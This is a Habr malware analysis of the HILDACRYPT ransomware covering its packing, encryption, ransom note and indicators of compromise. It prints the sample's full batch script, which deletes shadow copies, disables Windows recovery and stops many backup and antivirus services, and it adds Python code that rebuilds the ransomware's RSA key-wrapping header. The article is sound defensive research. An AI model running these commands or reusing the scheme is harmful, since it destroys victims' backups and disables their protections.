Hi Habr! Once again we are talking about a recent member of the ransomware category. HILDACRYPT is a new variant of the Hilda ransomware family, discovered in August 2019 and named after the Netflix cartoon that was used in distributing the program. Today we look at the technical details of this updated ransomware.
In the first version of the Hilda ransomware the link pointed to YouTube.
Static analysis
The ransomware is a PE32 .NET executable for MS Windows, 135,168 bytes in size. Both the main program code and the protector code are written in C#. According to the compilation timestamp, the binary was built on September 14, 2019.
Detect It Easy reports the ransomware as packed with both Confuser and ConfuserEx. That is not two different packers: ConfuserEx is the successor of Confuser, and the two share code signatures.
HILDACRYPT is in fact packed with ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Attack vector
Most likely the ransomware was hosted on one of the web-development sites, disguised as the legitimate XAMPP application.
The full infection chain is shown in the figure.
Obfuscation
The ransomware's strings are stored in encrypted form. At startup HILDACRYPT decodes each one from Base64 and decrypts it with AES-256-CBC.
Preparation
First, the ransomware creates a folder under %AppData% (AppData\Roaming) named with a randomly generated GUID (Globally Unique Identifier). It drops a .bat file into that folder and launches it through cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & exit
It then runs the batch script, which disables system functions and services.
The script is a long list of commands that destroy shadow copies and stop SQL Server, backup and antivirus services. The paired vssadmin resize shadowstorage calls (first 401MB, then unbounded) force Windows to discard existing shadow copies even where an explicit Delete Shadows would be blocked; the bcdedit lines disable the Windows recovery environment and make the system boot past failures silently.
For example, it tries to stop the Acronis Backup services (AcrSch2Svc, AcronisAgent, "Acronis VSS Provider" in the list below). It also targets backup systems and antivirus products from Veeam, Sophos, Kaspersky, McAfee and others.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop "Sophos Device Control Service" /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop "Zoolz 2 Service" /y
net stop McTaskManager /y
net stop "Sophos AutoUpdate Service" /y
net stop "Sophos System Protection Service" /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop "Symantec System Recovery" /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop "Sophos Health Service" /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop "Sophos Message Router" /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop "Sophos Clean Service" /y
net stop swi_update_64 /y
net stop "Sophos Web Control Service" /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop "Veeam Backup Catalog Data Service" /y
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop "Sophos MCS Client" /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop "SQLsafe Backup Service" /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop "Sophos Safestore Service" /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop "Sophos File Scanner Service" /y
net stop "Sophos Agent" /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop "Enterprise Client Service" /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop "SQL Backups" /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop "Sophos MCS Agent" /y
net stop RESvc /y
net stop "Acronis VSS Provider" /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop "SQLsafe Filter Service" /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
After the services and processes above have been stopped, the cryptolocker enumerates all running processes with the tasklist command to make sure the services it needs gone are no longer running.
tasklist /v /fo csv
The command prints a detailed list of running processes, one per line, with the fields separated by commas:
"csrss.exe","448","Services","0","1 896 KB","Unknown","N/A","0:00:03","N/A"
After this check the ransomware starts encrypting.
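As an added example (not code from the article or from the sample), the following Python script triages a batch file of this kind the way an analyst would, and then checks a tasklist /v /fo csv capture against it, which is the same check the ransomware performs on its own output. The batch excerpt, the tasklist rows and the VENDOR_HINTS mapping are constructed for the example; the service-to-vendor substrings are a reporting aid, not anything the sample contains.

```python
"""Triage of a recovery-inhibiting batch script and of tasklist CSV output.

Added example for this article, not code from the ransomware sample.
BATCH_EXCERPT, TASKLIST_CSV and VENDOR_HINTS are constructed for the example.
"""
import csv
import io
import re

# Constructed excerpt: a handful of lines from the dropped .bat quoted above.
BATCH_EXCERPT = """@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop "Sophos Device Control Service" /y
net stop McTaskManager /y
net stop VeeamBackupSvc /y
net stop MSSQLSERVER /y
net stop AcrSch2Svc /y
net stop AVP /y
net stop SAVService /y
del %0
"""

# Assumed substrings of service names per vendor (reporting aid only).
VENDOR_HINTS = {
    "Sophos": ("sophos", "savservice", "savadmin", "swi_"),
    "Veeam": ("veeam",),
    "McAfee": ("mcafee", "mctaskmanager", "mcshield", "mfe"),
    "Kaspersky": ("kav", "avp", "klnagent"),
    "Acronis": ("acronis", "acrsch"),
    "Microsoft SQL Server": ("mssql", "sqlagent", "sqlserveragent", "sqlwriter"),
}

NET_STOP_RE = re.compile(r'^net\s+stop\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def triage_batch(script: str) -> dict:
    """Return the recovery-inhibition indicators found in a batch script."""
    findings = {
        "shadow_storage_resized": False,
        "shadow_copies_deleted": False,
        "boot_recovery_disabled": False,
        "stopped_services": [],
        "self_delete": False,
    }
    for raw in script.splitlines():
        line = raw.strip()
        low = line.lower()
        if not line or low.startswith("::") or low.startswith("rem "):
            continue  # blank line or comment
        if low.startswith("vssadmin resize shadowstorage"):
            # Shrinking the diff area and growing it again makes VSS discard
            # existing snapshots even where 'Delete Shadows' is blocked.
            findings["shadow_storage_resized"] = True
        elif low.startswith("vssadmin delete shadows"):
            findings["shadow_copies_deleted"] = True
        elif low.startswith("bcdedit") and "recoveryenabled no" in low:
            findings["boot_recovery_disabled"] = True
        elif low == "del %0":
            findings["self_delete"] = True
        else:
            m = NET_STOP_RE.match(line)
            if m:
                findings["stopped_services"].append(m.group(1) or m.group(2))
    return findings


def targeted_vendors(services) -> set:
    """Map stopped service names to the vendors listed in VENDOR_HINTS."""
    hits = set()
    for svc in services:
        s = svc.lower()
        for vendor, keys in VENDOR_HINTS.items():
            if any(k in s for k in keys):
                hits.add(vendor)
    return hits


# Constructed tasklist /v /fo csv output (English-locale column names).
TASKLIST_CSV = (
    '"Image Name","PID","Session Name","Session#","Mem Usage","Status",'
    '"User Name","CPU Time","Window Title"\n'
    '"csrss.exe","448","Services","0","1,896 K","Unknown","N/A","0:00:03","N/A"\n'
    '"SavService.exe","1720","Services","0","12,340 K","Unknown","N/A","0:00:01","N/A"\n'
)


def running_images(tasklist_csv: str) -> list:
    """Parse tasklist /v /fo csv output into the list of image names."""
    return [row["Image Name"] for row in csv.DictReader(io.StringIO(tasklist_csv))]


def still_running(stopped_services, tasklist_csv: str) -> list:
    """Services from the script whose image name is still in the process list.

    Comparing a service name with an image basename is a triage heuristic;
    a real mapping needs 'sc qc <service>' or the Win32_Service class.
    """
    images = set()
    for img in running_images(tasklist_csv):
        img = img.lower()
        images.add(img[:-4] if img.endswith(".exe") else img)
    return [s for s in stopped_services if s.lower() in images]
```

Run against a full dropped script, triage_batch gives the list of every service the sample tried to stop, which is the list to feed back into service-restart and detection rules; still_running shows which of those survived, which is exactly what the ransomware checks before it starts encrypting.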
Encryption
File encryption
HILDACRYPT walks everything it finds on the hard drives, skipping only the Recycle.Bin and Reference Assemblies\Microsoft folders. The latter holds the dll, pdb and related files that .NET applications depend on; encrypting them could break the ransomware itself. Files to encrypt are selected by the following extension list:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
The ransomware encrypts user files with AES-256-CBC: a 256-bit key and a 16-byte initialization vector (IV).
In the screenshot below, byte_2 and byte_1 are filled with random bytes by GetBytes().
Key
IV
An encrypted file gets the extension .HCY!. Here is an example of an encrypted file; the key and IV shown above were generated for this file.
Key encryption
The cryptolocker stores the generated AES key inside the encrypted file. The beginning of the encrypted file carries a header in XML format with the fields HILDACRYPT, KEY, IV and FileLen, and looks as follows:
The AES key and the IV are encrypted with RSA-2048 and Base64-encoded. The RSA public key is kept in the cryptolocker body as one of the encrypted strings, in XML format:
<RSAKeyValue><Modulus>28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
This RSA public key is used to encrypt the per-file AES key. It is Base64-encoded and consists of the modulus and the public exponent 65537 (AQAB). Decryption requires the private RSA key, which only the attacker holds.
After RSA encryption the AES key is Base64-encoded and stored in the encrypted file.
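The key-wrapping scheme described above, as an added example written for this article (it is not the ransomware's code): the script parses the embedded public key, which is in the standard .NET RSAKeyValue XML form with the modulus and exponent quoted above, wraps a fresh AES key and IV with it, writes them into a header, and then parses that header back the way an incident responder would when preserving encrypted files. The header element layout (HILDACRYPT, KEY, IV, FileLen as nested XML elements) and the PKCS#1 v1.5 padding used for wrapping are assumptions: the article names the fields and the algorithm but shows neither the exact layout nor the padding mode. Nothing here can decrypt; that is the point, since only the attacker's private exponent can unwrap the blobs.

```python
"""Parse HILDACRYPT's RSA public key and build/parse its per-file key header.

Added example for this article, not the ransomware's own code. Header
layout and PKCS#1 v1.5 padding are assumptions; the key values are from
the article.
"""
import base64
import os
import xml.etree.ElementTree as ET

# Public key quoted in the article, in .NET RSAKeyValue XML form.
RSA_PUBLIC_KEY_XML = (
    "<RSAKeyValue><Modulus>"
    "28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1"
    "B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi"
    "49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQ"
    "ix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT7"
    "2/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ=="
    "</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
)


def parse_rsa_key_value(xml_text: str):
    """Return (modulus, exponent) as integers from .NET RSAKeyValue XML."""
    root = ET.fromstring(xml_text)
    n = int.from_bytes(base64.b64decode(root.findtext("Modulus")), "big")
    e = int.from_bytes(base64.b64decode(root.findtext("Exponent")), "big")
    return n, e


def rsa_wrap(data: bytes, n: int, e: int) -> bytes:
    """RSA-encrypt data with PKCS#1 v1.5 type-2 padding (assumed mode).

    Only the holder of the private exponent d can undo this; the public
    key alone gives no way back.
    """
    k = (n.bit_length() + 7) // 8  # 256 bytes for a 2048-bit modulus
    if len(data) > k - 11:
        raise ValueError("data too long for this modulus")
    ps = bytearray()
    while len(ps) < k - len(data) - 3:  # non-zero random padding string
        b = os.urandom(1)
        if b != b"\x00":
            ps += b
    em = b"\x00\x02" + bytes(ps) + b"\x00" + data
    return pow(int.from_bytes(em, "big"), e, n).to_bytes(k, "big")


def build_header(aes_key: bytes, iv: bytes, file_len: int, n: int, e: int) -> bytes:
    """Assumed header layout: Base64(RSA(key)), Base64(RSA(iv)) and FileLen."""
    root = ET.Element("HILDACRYPT")
    ET.SubElement(root, "KEY").text = base64.b64encode(rsa_wrap(aes_key, n, e)).decode()
    ET.SubElement(root, "IV").text = base64.b64encode(rsa_wrap(iv, n, e)).decode()
    ET.SubElement(root, "FileLen").text = str(file_len)
    return ET.tostring(root)


def parse_header(blob: bytes) -> dict:
    """Recover the wrapped key blobs and original length from an .HCY! file.

    The blobs stay opaque without the attacker's private key; keep them,
    they are what a later key leak or official decryptor would need.
    """
    end = blob.index(b"</HILDACRYPT>") + len(b"</HILDACRYPT>")
    root = ET.fromstring(blob[:end])
    return {
        "wrapped_key": base64.b64decode(root.findtext("KEY")),
        "wrapped_iv": base64.b64decode(root.findtext("IV")),
        "file_len": int(root.findtext("FileLen")),
        "header_len": end,
    }


def demo() -> dict:
    """Build one header with the article's public key and parse it back."""
    n, e = parse_rsa_key_value(RSA_PUBLIC_KEY_XML)
    hdr = build_header(os.urandom(32), os.urandom(16), 1234, n, e)
    info = parse_header(hdr + b"\x00" * 16)  # constructed ciphertext tail
    info["modulus_bits"] = n.bit_length()
    info["exponent"] = e
    info["header_len_ok"] = info["header_len"] == len(hdr)
    return info
```

The check that matters for triage is in demo(): the exponent decodes to 65537 and the modulus is 2048 bits, so each wrapped blob is exactly 256 bytes, which is why a 344-character Base64 string in the header is the signature of an RSA-2048-wrapped key rather than a raw AES key.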
Ransom note
When encryption finishes, HILDACRYPT writes an HTML file into every folder in which it encrypted files. The ransom note lists two e-mail addresses the victim can use to contact the attacker.
The note also contains the line "No loli is safe;)", a reference to anime and manga characters with the appearance of little girls, which are banned in Japan.
Conclusion
HILDACRYPT, a new ransomware family, has released a new version. Its encryption scheme leaves the victim unable to decrypt the files the ransomware has encrypted. The cryptolocker actively disables the protective services of backup systems and antivirus products. The author of HILDACRYPT is a fan of the Netflix animated series Hilda; the trailer of the series was linked from the ransom note of the previous version.
As usual, we close with the indicators of compromise.
Indicators of compromise
File extension HCY!
HILDACRYPTreadMe.html
xamp.exe with a single "p" and without a digital signature
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Source: www.habr.com